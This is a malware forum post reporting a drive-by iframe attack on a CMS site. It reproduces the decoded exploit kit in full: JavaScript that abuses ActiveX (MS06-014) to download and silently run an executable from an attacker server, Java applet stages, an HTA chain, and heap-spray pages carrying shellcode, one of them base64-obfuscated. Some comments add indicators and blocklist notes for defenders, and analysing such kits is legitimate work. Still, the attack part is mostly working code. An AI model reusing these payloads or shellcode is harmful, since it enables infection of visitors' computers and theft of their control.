
iframe attack: several exploits

 
Post new topic   Reply to topic       All -> FavForums -> Web Malware Links [del.icio.us!] [digg it!] [reddit!]
View previous topic :: View next topic  
Author Message
philipp2



Joined: Apr 11, 2008
Posts: 22
Location: Germany

PostPosted: Sat Apr 12, 2008 5:32 pm    Post subject: iframe attack: several exploits

hi,
i came across an iframe attack in a CMS installation. here are the details:

hxxp://www.yourxxxblog.biz/js_go_f1.php
--> hxxp://www.dir4you.org/TDS/go.php?sid=1
redirects to hxxp://www.dir4you.org/6/testasd/
here is a huge piece of obfuscated JavaScript.
decoded, it looks like this:

Code:

<HTML xmlns:IE>
<HEAD>
         <STYLE type='text/css'>
            IE\:clientCaps {behavior:url(#default#clientcaps)}
         </STYLE>
</HEAD>
<IE:clientCaps ID="oClientCaps" />
<script type="text/javascript" language="JavaScript">

// Queries the IE-only clientCaps behavior (declared in the <STYLE> block above)
// for the version of the component identified by CLSID. Returns the comma-split
// version parts, or [0,0,0,0] when the component is not installed. ExploitAll
// uses this to decide whether the Microsoft JVM stage applies.
function GetVersion(CLSID)
{
 if (oClientCaps.isComponentInstalled(CLSID,"ComponentID")){return oClientCaps.getComponentVersion(CLSID,"ComponentID").split(",");}
 else {return Array(0,0,0,0);}
}

// Maps the navigator.appVersion string to a short Windows tag. There is no
// final else, so anything newer than NT 5.2 yields undefined. ExploitAll
// stores the result in WinOS but never consults it, so this is fingerprinting
// leftover rather than a gate on any stage.
function Get_Win_Version(IE_vers)
{
 if (IE_vers.indexOf('Windows 95') != -1) return "95"
 else if (IE_vers.indexOf('Windows NT 4') != -1) return "NT"
 else if (IE_vers.indexOf('Win 9x 4.9') != -1) return "ME"
 else if (IE_vers.indexOf('Windows 98') != -1) return "98"
 else if (IE_vers.indexOf('Windows NT 5.0') != -1) return "2K"
 else if (IE_vers.indexOf('Windows NT 5.1') != -1) return "XP"
 else if (IE_vers.indexOf('Windows NT 5.2') != -1) return "2K3"
}


// Tries six CreateObject/GetObject call shapes on the control `o` to obtain an
// instance of ProgID `n` (WScript.Shell or ADODB.Stream in the callers below).
// Every exception is swallowed, so a control that refuses simply yields null.
// The eval() wrappers only keep the method names out of a plain-text scan.
// Detection note: page script reaching WScript.Shell / ADODB.Stream through
// another control's CreateObject is the classic MS06-014 signature, which the
// function name confirms.
function MS06014CreateO(o, n) {
 var r = null;
 try { eval('r = o.CreateObject(n)') }catch(e){}
 if (! r) {try { eval('r = o.CreateObject(n, "")') }catch(e){}}
 if (! r) {try { eval('r = o.CreateObject(n, "", "")') }catch(e){}}
 if (! r) {try { eval('r = o.GetObject("", n)') }catch(e){}}
 if (! r) {try { eval('r = o.GetObject(n, "")') }catch(e){}}
 if (! r) {try { eval('r = o.GetObject(n)') }catch(e){}}
 return(r);
}

// Download-and-execute stage, reached only after MS06014Exploit has found a
// control that hands out WScript.Shell. Fetches the payload URL synchronously
// (XMLHttpRequest, then two ActiveX fallbacks), writes responseBody through
// ADODB.Stream (Type=1 binary, Mode=3, SaveToFile overwrite flag 2) to a path
// built from the TEMP environment value plus "mbroit.exe", then launches it
// hidden (Run(..., 0)). The fixed URL and the dropped file name are the IoCs
// for this page. The catch(e) parameters shadow the Environment object `e`,
// which is not used after the TEMP lookup.
function MS06014Go(a) {
 var s = MS06014CreateO(a, "WScript.Shell");
 var o = MS06014CreateO(a, "ADODB.Stream");
 var e = s.Environment("Process");
 var url = 'http://www.dir4you.org/6/file.php?test11';
 var xml = null;
 var bin = e.Item("TEMP") + "mbroit.exe";
 var dat;
 try { xml=new XMLHttpRequest(); }
 catch(e) {
 try { xml = new ActiveXObject("Microsoft.XMLHTTP"); }
 catch(e) {
 xml = new ActiveXObject("MSXML2.ServerXMLHTTP");
 }
 }
 if (! xml) return(0);
 xml.open("GET", url, false)
 xml.send(null);
 dat = xml.responseBody;
 // Binary stream, read/write, overwrite an existing file.
 o.Type = 1;
 o.Mode = 3;
 o.Open();
 o.Write(dat);
 o.SaveToFile(bin, 2);
 // Window style 0: the dropped executable runs without a visible window.
 s.Run(bin,0);
}

// Walks the CLSID list, instantiating each as <object classid="clsid:...">
// and stopping at the first control that hands out WScript.Shell via
// MS06014CreateO; on success runs MS06014Go and returns 1, otherwise 0.
// Every entry starts with '{', so the ActiveXObject(ProgID) branch below is
// never taken. Defender note: each CLSID here names one control the kit
// expects to abuse (t[0] is widely documented as RDS.DataSpace, the MS06-014
// control); they are the kill-bit / blocklist candidates for this page.
function MS06014Exploit() {
 var i = 0;
 var t = new Array('{BD96C556-65A3-11D0-983A-00C04FC29E36}','{AB9BCEDD-EC7E-47E1-9322-D4A210617116}','{0006F033-0000-0000-C000-000000000046}','{0006F03A-0000-0000-C000-000000000046}','{6e32070a-766d-4ee6-879c-dc1fa91d2fc3}','{6414512B-B978-451D-A0D8-FCFDF33E833C}','{7F5B7F63-F06F-4331-8A26-339E03C0AE3D}','{06723E09-F4C2-43c8-8358-09FCD1DB0766}','{639F725F-1B2D-4831-A9FD-874847682010}','{BA018599-1DB3-44f9-83B4-461454C84BF8}','{D0C07D56-7C69-43F1-B4A0-25F5A11FAB19}','{E8CCCDDF-CA28-496b-B050-6C07C962476B}',null);

 // The trailing null terminates the loop.
 while (t[i]) {
 var a = null;

 if (t[i].substring(0,1) == '{') {
 a = document.createElement("object");
 a.setAttribute("classid", "clsid:" + t[i].substring(1, t[i].length - 1));
 } else {
 try { a = new ActiveXObject(t[i]); } catch(e){}
 }

 if (a) {
 try {
 var b = MS06014CreateO(a, "WScript.Shell");
 if (b) {
 MS06014Go(a);
 return(1);
 }
 } catch(e){}
 }
 i++;
 }
 return(0);
}
// Java stage. Through the applet named maniman (written by Negcash) it
// reflects sun.misc.Unsafe, calls the applet's foobar(unsafe) hook, defines a
// class from applet-held bytes (luokka / classSize) with Unsafe.defineClass,
// allocates it without running a constructor and hands it the payload URL.
// Any failure returns -1; the final return is unreachable. Indicators: an
// applet exposing sun.misc.Unsafe to page script and the identifiers
// maniman / animan / omfg.
function pass2()
{
 try {
 var unsafeclass = document.maniman.getClass().forName("sun.misc.Unsafe");
 var unsafemeth = unsafeclass.getMethod("getUnsafe", null);
 var unsafe = unsafemeth.invoke(unsafemeth, null);
 document.maniman.foobar(unsafe);
 var chenref = unsafe.defineClass("omfg", document.maniman.luokka, 0, document.maniman.classSize);
 var chen = unsafe.allocateInstance(chenref);
 chen.setURLdl("http://www.dir4you.org/6/file.php?test11");
 chen.setUname("789");
 chen.setCID("other");
 return chen.perse(unsafe);
 } catch (d) {return -1;}
 return -1;
}

// Fallback applet (OP.jar / OP.class) that receives the payload URL in the
// linkurl parameter. Always returns 1, so Negcash cannot tell whether the
// applet actually loaded.
function pass3(){
 document.write("<applet archive=OP.jar code=OP.class width=1 height=1 MAYSCRIPT>");
 document.write("<param name=usid value=us0105>");
 document.write("<param name=linkurl value=\"http://www.dir4you.org/6/file.php?test11\"></applet>");
 return 1;
}

// Writes the helper applet animan.class (name=maniman, MAYSCRIPT so page
// script can call into it) and runs pass2; if pass2 does not report 1, falls
// back to the OP.jar applet in pass3.
function Negcash(){
document.write("<applet code=animan.class name=maniman height=1 width=1 MAYSCRIPT></applet>");
if (pass2() != 1) {
 pass3();
}

}

// Applet stage aimed at the Microsoft JVM (ms03011.jar / MagicApplet.class)
// with the payload URL passed as ModulePath. Only reached when GetVersion
// reports an installed MS JVM with build number below 3810 (see ExploitAll).
function ExploitMS03011(){
document.write("<applet archive=\"ms03011.jar\" code=\"MagicApplet.class\" width=1 height=1>");
document.write("<param name=\"ModulePath\" value=\"http://www.dir4you.org/6/file.php?test11\"></applet>");
}

// HTML Help control stage (hhctrl, clsid adb880a6-...) chained with the DHTML
// Editing control (clsid 2D360201-..., ActivateActiveXControls=1). A copy of
// the hhctrl object is kept as text in a hidden textarea, gets an extra Item1
// PARAM whose javascript: value repoints the first link at an mshta target
// under HTA_URL (ms05001.hta.php) and clicks it, and is then injected into
// ObjectContainer. HHClick() is fired on both controls 500 ms apart.
// HTA_URL, HTA_location, Init_HTA and Obj_Last_Param are implicit globals.
// Detection: the two CLSIDs together with "ms-its:" / "mshta" inside PARAM
// values; the fix is the vendor patch plus kill-bits for both controls.
function MS05001Exploit() {
document.write("<OBJECT id=\"hhctrl_HTML_Opener\" type=\"application/x-oleobject\" classid=\"clsid:adb880a6-d8ff-11cf-9377-00aa003b7a11\" style=\"display:none\"> <PARAM name=\"Command\" value=\"Related Topics, MENU\"><PARAM name=\"Button\" value=\"Text:Just a button\"><PARAM name=\"Window\" value=\"$global_blank\"><PARAM name=\"Item1\" value=\"command;ms-its:addremov.chm::/win_addprog_window_component.htm\"></OBJECT>");
document.write("<textarea id=\"ObjMaker\" cols=10 rows=10 style=\"display:none\"><OBJECT id=\"hhctrl_JS_Runner\" type=\"application/x-oleobject\" classid=\"clsid:adb880a6-d8ff-11cf-9377-00aa003b7a11\" style=\"display:none\"><PARAM name=\"Command\" value=\"Related Topics, MENU\"><PARAM name=\"Button\" value=\"Text:Just a button\"><PARAM name=\"Window\" value=\"$global_blank\"></textarea>");
document.write("<OBJECT id=\"DHTML_Edit\" classid=\"clsid:2D360201-FFF5-11d1-8D03-00A0C959BC0A\" width=10 height=10 align=\"middle\"><PARAM NAME=\"ActivateApplets\" VALUE=\"1\"><PARAM NAME=\"ActivateActiveXControls\" VALUE=\"1\"></OBJECT> ");
document.write("<DIV id=\"ObjectContainer\"></DIV>");

// Second-stage location; the HTA listed further down in this post.
HTA_URL="http://www.dir4you.org/6/testasd/";
var Obj_body=document.all.ObjMaker.innerText;
HTA_location='\",ms'+'hta,'+HTA_URL+'ms05001.hta.php?adv=789'+'\"';
Init_HTA='var alink=document.links[0].href%3Baparams=alink.split(\" \")%3Bchmpath=aparams[0].split(\",\")%3Bnlink=chmpath[0]+'+HTA_location+'+\" \"+aparams[1]+\" \"+aparams[2]+\" \"+aparams[3]%3Bdocument.links[0].href=nlink%3Bdocument.links[0].click();';
Obj_Last_Param="\r\n\<PARAM name=\"Item1\" value='command;javascript:"+Init_HTA+"'>";
document.all.ObjMaker.innerText=Obj_body+Obj_Last_Param+'</OBJECT>';
ObjectContainer.innerHTML=document.all.ObjMaker.value;
hhctrl_HTML_Opener.HHClick();
setTimeout("hhctrl_JS_Runner.HHClick()",500);
setTimeout("self.focus()",1000);
}

// Browser dispatcher, run from <body onload>.
// IE on Win32: reads the Microsoft JVM version through clientCaps and runs
// the MS03011 applet when the build is below 3810; then tries MS06014Exploit
// and, if that does not return 1, the Java stage (Negcash) followed by
// MS05001Exploit unless clientInformation.appMinorVersion lists "SP2".
// WinOS is computed but never used; FullVersion and PatchList are implicit
// globals.
// Gecko ("Netscape"): parses the Firefox version out of userAgent and
// redirects 0.x and 1.0.0-1.0.4 to mfsa200550.php, other 1.x to ms06006.php;
// Firefox 2+ and non-Firefox Gecko fall through with no action. j, k and
// FF_vers are implicit globals.
function ExploitAll(){

if (navigator.appName=="Microsoft Internet Explorer")
{

 var IEversion=navigator.appVersion;
 var IEplatform=navigator.platform;
 if (IEplatform.search("Win32") != -1)
 {
 var WinOS=Get_Win_Version(IEversion);
 FullVersion=clientInformation.appMinorVersion;
 PatchList=FullVersion.split(";");
 // CLSID of the Microsoft Java VM component; [0,0,0,0] when absent.
 var JVM_vers = GetVersion("{08B0E5C0-4FCB-11CF-AAA5-00401C608500}");

 var XP_SP2_patched=0;

 if ((JVM_vers[0]!=0)&&(JVM_vers[2]<3810))
 {
 ExploitMS03011();
 }
 if(MS06014Exploit() != 1){
 Negcash();
 // SP2 in the minor-version list is the only thing that suppresses MS05001.
 for (var i=0; i < PatchList.length; i++){
 if (PatchList[i]=="SP2"){
 XP_SP2_patched=1;
 }
 }
 if(XP_SP2_patched==0){
 MS05001Exploit();
 }
 }
 }
}
else if (navigator.appName=="Netscape")
{
 j=navigator.userAgent.indexOf('Firefox');
 if (j != -1)
 {
 // Skip past "Firefox/" to the version digits.
 j=j+"Firefox/".length;
 var FF_name=navigator.userAgent.substr(j);
 k=FF_name.indexOf(" ");
 if (k != -1)
 {
 FF_name=FF_name.substr(0,k);
 }
 FF_vers=FF_name.split(".");
 if (FF_vers[2] == undefined)
 {
 FF_vers[2]=0;
 }
 if (FF_vers[0]==0){
 window.location="http://www.dir4you.org/6/testasd/mfsa200550.php?adv=789";
 }else if (FF_vers[0] == 1){
 if ((FF_vers[1]==0)&&(FF_vers[2]<5)) {
 window.location="http://www.dir4you.org/6/testasd/mfsa200550.php?adv=789";
 }else{
 window.location="http://www.dir4you.org/6/testasd/ms06006.php?adv=789";
 }
 }
 }
}
}
// Runs at parse time, before the onload dispatcher: unconditionally loads a
// second, hidden exploit page (listed further down in this post).
document.write('<iframe src="http://www.freesexonline.biz/10/" style="display:none"></iframe>');
</script>
</head>
<body onload="ExploitAll()">
</body>
</html>


now here we have a lot of exploits.

hxxp://www.dir4you.org/6/testasd/ms05001.hta.php?adv=789 :
Code:

<HTML><HEAD> <HTA:APPLICATION id=PXP APPLICATIONNAME="PXP" SHOWINTASKBAR=NO CAPTION=YES SINGLEINSTANCE=YES MAXIMIZEBUTTON=NO MINIMIZEBUTTON=NO WINDOWSTATE=MINIMIZE /> </HEAD> <BODY> <SCRIPT> self.moveTo(5000,5000); function Dl(Rp,Ln) { try { var SC=new ActiveXObject("MSScriptControl.ScriptControl"); SC.Language="JavaScript"; SC.Reset(); var oX=new ActiveXObject("Microsoft.XMLHTTP"); oX.Open("GET",Rp,0); oX.Send(); sAX=unescape("%41DODB%2eStream"); var oS=new ActiveXObject(sAX); SC.AddObject("oAS", oS); SC.AddObject("oXS", oX); aC="var XB=oXS.responseBody;oAS.Type=1;oAS.Mode=3;oAS.Open();oAS.Write(XB);"+"oAS.Sa"+"veToFile('"+Ln+"',2);"; var oA=new ActiveXObject("Shell.Application"); SC.ExecuteStatement(aC); oA.ShellExecute(Ln); r=0; } catch(e){r=-1;} return r; }


hxxp://www.dir4you.org/6/testasd/mfsa200550.php?adv=789 :
Code:

<html>
<head>
<script language="javascript">
    var Shellcode=unescape("%u9090%u9090%u3390%u33c0%uebc9%u5e12%ub966%u0100%ufe8b%u2e80%u8007%u0436%ue246%uebf7%ue805%uffe9%uffff%ub5f4%u0b0b%u620b%uac67%u0b3b%u0b0b%u4b96%u960f%u1f7b%u96b0%u1373%ufa96%u0775%uf364%u0b55%u0b0b%u04ed%u7273%u0b71%u730b%u7d78%u706f%u0257%u9619%uf3f3%u0b37%u0b0b%uef8e%u962b%u75df%u5e2b%u5902%uca07%u2307%u6e5f%u787b%u47ca%u0723%u6831%u6883%u47c9%u1323%u3e0b%u5bcb%u5e5b%u5b5a%u5902%u961b%u75df%u5e08%u5902%u0213%u0f59
%u595c%u7896%u963f%u3877%u0e83%u59f8%u7996%u0e2b%u3ef8%u54d4%ub04c%uc80e%ue63e%uc112%u431b%u77fd%ucc13%u10d6%ue50e%uf64b%u46fc%u7822%u61ea%u6196%u0e27%u69e0%u0f96%u9656%u1f61%ue00e%u0796%u0e96%ub6c8%u6461%uf3ce%u025c%u0202%u5191%uef11%ue6f0%u03ef%u01a3%u1195%ue381%u7eed%u2539%u7b32%u7773%u7b77%u3245%u7a32%u7a7a%u8431%u7872%u707d%u6768%u687e%u7d6c%u736e%u7431%u6971%u3272%u7e7b%u3276%u7872%u3177%u737b%u427b%u406d%u6970%u6c7e%u3b3d%u383b%u3830%u0b3b");
    function Run_BOF() {
   var spraySlide1 = unescape("%u002C%u11C0");
   var spraySlide2 = unescape("%u002C%u1200");
   var spraySlide3 = unescape("%u9090%u9090");
   var heapSprayToAddress=0x12000000;
   var heapBlockSize=0x400000;
   var ShellcodeSize=Shellcode.length * 2;
   var spraySlideSize=heapBlockSize-(ShellcodeSize+0x38);
   spraySlide1 = getSpraySlide(spraySlide1,spraySlideSize);
   spraySlide2 = getSpraySlide(spraySlide2,spraySlideSize);
   spraySlide3 = getSpraySlide(spraySlide3,spraySlideSize);
   MemoryBlocks=(heapSprayToAddress-0x400000)/heapBlockSize;
   memory = new Array();
   for (i=0;i<MemoryBlocks;i++)
   { memory[i]=(i%3==0) ? spraySlide1 + Shellcode:
   (i%3==1) ? spraySlide2 + Shellcode: spraySlide3 + Shellcode; }
   location.href="javascript:void (new InstallVersion());";
   var eaxAddress = 0x1180002C;
   (new InstallVersion).compareTo(new Number(eaxAddress >> 1));
   }
   function getSpraySlide(spraySlide, spraySlideSize) {
while (spraySlide.length*2<spraySlideSize)
{ spraySlide+=spraySlide; }
spraySlide=spraySlide.substring(0,spraySlideSize/2);
return spraySlide;
}

</script>
</head>
<body onload="Run_BOF()"/>
</html>


hxxp://www.dir4you.org/6/testasd/ms06006.php?adv=789 :
Code:

<script language=JavaScript>function lrkiq(str){var fjussf="ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz0123456789+/";var wgasghq="";var hzivnpfo="";for(var i=0;i<str.length;i++){wgasghq+=ahpfvutqr((6-fjussf.indexOf(str.substr(i,1)).toString(2).length))+fjussf.indexOf(str.substr(i,1)).toString(2);if(wgasghq.length%8==0){hzivnpfo+=String.fromCharCode(parseInt(wgasghq.substr(0,8),2));wgasghq="";}else if (wgasghq.length>8){hzivnpfo+=String.fromCharCode(parseInt(wgasghq.substr(0,8),2));wgasghq=wgasghq.substr(8,(wgasghq.length-8));}else if (wgasghq.length<8){continue;}}function ahpfvutqr (n) {var b ="";for(var i=0;i<n;i++){b+="0";}return b;}return hzivnpfo;}document.write(lrkiq("IAo8SFRNTD48SEVBRD48U0NSSVBUIGxhbmd1YWdlPSJqYXZhc2NyaXB0Ij4KdmFyIHNwcmF5ID0gdW5lc2NhcGUoIiV1NDE0MSV1NDE0MSV1NDE0MSV1NDE0MSV1NDE0MSV1NDE0MSV1NDE0MSV1NDE0MSV1NDI0MiV1NDM0MyIpOwp3aGlsZSAoc3ByYXkubGVuZ3RoIDwgMHgxMDAwMDAwKSB7CnNwcmF5Kz1zcHJheTsgfQpzcHJheSs9dW5lc2NhcGUoIiV1OTA5MCV1OTA5MCV1MzM5MCV1MzNjMCV1ZWJjOSV1NWUxMiV1Yjk2NiV1MDBlZSV1ZmU4YiV1MmU4MCV1ODAwMiV1MDIzNiV1ZTI0NiV1ZWJmNyV1ZTgwNSV1ZmZlOSV1ZmZmZiV1YWFlZCV1MDQwNCV1NWYwNCV1YTU
2OCV1MDQzNCV1MDQwNCV1NDQ4YiV1OGIxMCV1MjA3NCV1OGJiMSV1MGM2YyV1Zjc4YiV1MDg2YSV1ZWM1ZCV1MDQ0YSV1MDQwNCV1ZmRlMiV1NmY2YyV1MDQ2ZSV1NmMwNCV1NzI3OSV1NzE3MCV1ZmY1OCV1OGIxNiV1ZWNlYyV1MDQzOCV1MDQwNCV1ZjA4MyV1OGIyNCV1NmFlMCV1NTMyNCV1NTZmZiV1YzcwOCV1MWMwOCV1NjM2MCV1Nzk3NCV1NDhjNyV1MDgxYyV1NjkyZSV1Njk3YyV1NDhjNiV1MGMxYyV1MzMwNCV1NTRjNCV1NTM1NCV1NTQ1NyV1NTZmZiV1OGIxNCV1NmFlMCV1NTMwOSV1NTZmZiV1ZmYwYyV1MTA1NiV1NTY1NSV1Nzk4YiV1OGI0MCV1Mzk3OCV1MDM3YyV1NTZmOSV1N
zY4YiV1MDMyNCV1MzNmOSV1NGRjZCV1YjE0NSV1YzkwMyV1ZGIzMyV1YmUwZiV1M2MxNCV1NzhmMiV1YzUwYyV1MTFjYiV1ZGEwMyV1ZWI0NCV1M2JmNSV1NzkxZiV1NWVlNyV1NWU4YiV1MDMyOCV1NjZlMSV1MTA4YiV1OGI0YiV1MjA1ZSV1ZTEwMyV1MDg4YiV1MDM4YiV1YWJjOSV1NWQ1ZSV1ZWNjMyV1ZmY1NSV1ZmZmZiV1NGU4ZSV1ZjAwZSV1ZGJmMSV1ZmNmMCV1ZmU5YyV1MGU4YSV1ZGM3ZSV1NzNlMiV1MWEzNiV1NzQyZiV1Nzg2YyV1NzQ3OCV1MmYzYSV1NjIyZiV1Nzg3OSV1NzY2NSV1NzI2OSV1NjU3OCV1MmU3OCV1NmY2MyV1MmY3MSV1Nzk2ZiV1MmU3OCV1NmM3NCV1M2Y3NCV1NDE2M
iV1N2M2OSV1MzQ3NCV1MDQzOCIpOwo8L1NDUklQVD48L0hFQUQ+CjxCT0RZPgo8RU1CRUQgU1JDPSItLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS
0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0
tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tL
S0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS
0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0t
LS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tQUFBQUJCQkJDQ0NDREREREVFRUVGRkZGR0dHR0hISEhJSUlJSkpKSktLS0tMTExMQUFBTk5OTk9PT09BQUFRUVFRUlJSUlNTU1NUVFRUVVVVVVZWVlZXV1dXWFhYWFlZWVlaWlpaMDAwMDExMTEyMjIyMzMzMzQ0NDQ1NTU1NjY2Njc3Nzc4ODg4OTk5OS4mI3g3NzsmI3g2ZDsmI3g3NjsiPjwvRU1CRUQ+CjwvQk9EWT4KPC9IVE1MPgo="));</script>


hxxp://www.freesexonline.biz/10/ :
Code:

<html xmlns="http://www.w3.org/1999/xhtml">
<body>
<script>

// Globals shadowed by my()'s parameters; neither these nor my() are referenced
// again on this page, so this is obfuscation filler.
var aaaaaa = 1;
var bbbbbb = 2;
var cccccc = 3;

// Filler function: never called on this page. Returns
// ((aaaaaa + bbbbbb) + cccccc) + aaaaaa, evaluated left to right, so string
// arguments concatenate in that order.
function my(aaaaaa,bbbbbb,cccccc) {
  var firstPair = aaaaaa + bbbbbb;
  var withThird = firstPair + cccccc;
  return withThird + aaaaaa;
}

   /*
   var shellcode = unescape("%u4343%u4343%u0feb%u335b%u66c9%u80b9%u8001%uef33" +
   "%ue243%uebfa%ue805%uffec%uffff%u8b7f%udf4e%uefef%u64ef%ue3af%u9f64%u42f3%u9f64%u6ee7%uef03%uefeb" +
   "%u64ef%ub903%u6187%ue1a1%u0703%uef11%uefef%uaa66%ub9eb%u7787%u6511%u07e1%uef1f%uefef%uaa66%ub9e7" +
   "%uca87%u105f%u072d%uef0d%uefef%uaa66%ub9e3%u0087%u0f21%u078f%uef3b%uefef%uaa66%ub9ff%u2e87%u0a96" +
   "%u0757%uef29%uefef%uaa66%uaffb%ud76f%u9a2c%u6615%uf7aa%ue806%uefee%ub1ef%u9a66%u64cb%uebaa%uee85" +
   "%u64b6%uf7ba%u07b9%uef64%uefef%u87bf%uf5d9%u9fc0%u7807%uefef%u66ef%uf3aa%u2a64%u2f6c%u66bf%ucfaa" +
   "%u1087%uefef%ubfef%uaa64%u85fb%ub6ed%uba64%u07f7%uef8e%uefef%uaaec%u28cf%ub3ef%uc191%u288a%uebaf" +
   "%u8a97%uefef%u9a10%u64cf%ue3aa%uee85%u64b6%uf7ba%uaf07%uefef%u85ef%ub7e8%uaaec%udccb%ubc34%u10bc" +
   "%ucf9a%ubcbf%uaa64%u85f3%ub6ea%uba64%u07f7%uefcc%uefef%uef85%u9a10%u64cf%ue7aa%ued85%u64b6%uf7ba" +
   "%uff07%uefef%u85ef%u6410%uffaa%uee85%u64b6%uf7ba%uef07%uefef%uaeef%ubdb4%u0eec%u0eec%u0eec%u0eec" +
   "%u036c%ub5eb%u64bc%u0d35%ubd18%u0f10%u64ba%u6403%ue792%ub264%ub9e3%u9c64%u64d3%uf19b%uec97%ub91c" +
   "%u9964%ueccf%udc1c%ua626%u42ae%u2cec%udcb9%ue019%uff51%u1dd5%ue79b%u212e%uece2%uaf1d%u1e04%u11d4" +
   "%u9ab1%ub50a%u0464%ub564%ueccb%u8932%ue364%u64a4%uf3b5%u32ec%ueb64%uec64%ub12a%u2db2%uefe7%u1b07" +
   "%u1011%uba10%ua3bd%ua0a2%uefa1%u2E2E%u6C2F%u616F%u2F64%u6966%u656C%u652E%u6578");
   */


   var shellcode="%u54EB%u758B%u8B3C%u3574%u0378%u56F5%u768B%u0320%u33F5%u49C9%uAD41%uDB33%u0F36%u14BE%u3828%u74F2%uC108%u0DCB%uDA03%uEB40%u3BEF%u75DF%u5EE7%u5E8B%u0324%u66DD%u0C8B%u8B4B%u1C5E%uDD03%u048B%u038B%uC3C5%u7275%u6D6C%u6E6F%u642E%u6C6C%u4300%u5C3A%u2E55%u7865%u0065%uC033%u0364%u3040%u0C78%u408B%u8B0C%u1C70%u8BAD%u0840%u09EB%u408B%u8D34%u7C40%u408B%u953C%u8EBF%u0E4E%uE8EC%uFF84%uFFFF%uEC83%u8304%u242C%uFF3C%u95D0%uBF50%u1A36
